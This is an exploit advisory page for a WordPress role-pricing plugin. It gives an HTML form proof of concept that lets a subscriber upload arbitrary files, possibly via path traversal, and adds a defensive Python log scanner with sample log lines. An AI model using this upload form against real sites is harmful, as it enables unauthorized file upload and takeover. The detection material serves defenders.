## https://sploitus.com/exploit?id=WPEX-ID:696868F7-409D-422D-87F4-92FC6BF6E74E
While logged in as a subscriber, open the HTML code below, choose a file to upload, and submit the form:

```html
<form action="https://example.com/wp-admin/admin-ajax.php?action=afcsp_upload_csv" method="POST" enctype="multipart/form-data">
    <input type="file" name="afcsp_import_file" value="File to upload">
    <input type="submit" name="submit" value="submit">
</form>
```

The file is uploaded to https://example.com/wp-content/uploads/addify-role-pricing/ under the same name as the original (the path can also be found in the upload response). A path traversal vector could also be used to upload the file anywhere.
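
For defenders reviewing a site that runs this plugin, the following log-review sketch is an added example, not part of the original advisory. It assumes combined-format web access logs; the function names and the sample log lines are constructed for illustration, while the action name and upload directory are the ones given above.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumes Apache/nginx combined log format; function names are illustrative.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*"')
UPLOAD_ACTION = "afcsp_upload_csv"                       # AJAX action from the page
UPLOAD_DIR = "/wp-content/uploads/addify-role-pricing/"  # upload directory from the page

def classify(line):
    """Return (ip, finding) for a log line worth reviewing, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target = m.groups()
    url = urlsplit(target)
    # 1) POST to the plugin's upload action. Only the query string is visible
    #    in access logs; an action sent in the POST body will not show up here.
    if (method == "POST" and url.path.endswith("/wp-admin/admin-ajax.php")
            and UPLOAD_ACTION in parse_qs(url.query).get("action", [])):
        return ip, "upload-action"
    # 2) Request for anything other than a CSV inside the plugin upload directory.
    idx = url.path.find(UPLOAD_DIR)
    if idx != -1:
        name = url.path[idx + len(UPLOAD_DIR):]
        if name and not name.lower().endswith(".csv"):
            return ip, "non-csv-in-upload-dir"
    return None

def scan(lines):
    """Return [(line_number, ip, finding), ...] for all flagged lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        hit = classify(line)
        if hit:
            findings.append((n, *hit))
    return findings

# Constructed sample log lines (documentation IP ranges, invented file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2024:10:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=afcsp_upload_csv HTTP/1.1" 200 58',
    '203.0.113.7 - - [10/Jan/2024:10:00:05 +0000] "GET /wp-content/uploads/addify-role-pricing/sample.php HTTP/1.1" 200 12',
    '198.51.100.4 - - [10/Jan/2024:10:01:00 +0000] "POST /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 40',
    '198.51.100.4 - - [10/Jan/2024:10:02:00 +0000] "GET /wp-content/uploads/addify-role-pricing/prices.csv HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Administrator imports hit the same action, so an `upload-action` finding is a lead to correlate with the role of the logged-in account. Because of the path traversal noted above, files may land outside the plugin directory, so the second check does not replace a file-integrity review of the whole web root.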